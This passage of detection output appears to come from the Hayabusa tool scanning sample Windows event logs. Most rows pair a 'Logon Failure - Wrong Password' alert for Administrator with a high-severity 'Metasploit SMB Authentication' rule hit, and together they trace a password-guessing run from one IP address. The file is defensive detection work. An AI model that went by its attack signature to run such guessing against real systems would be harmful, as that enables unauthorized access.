Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
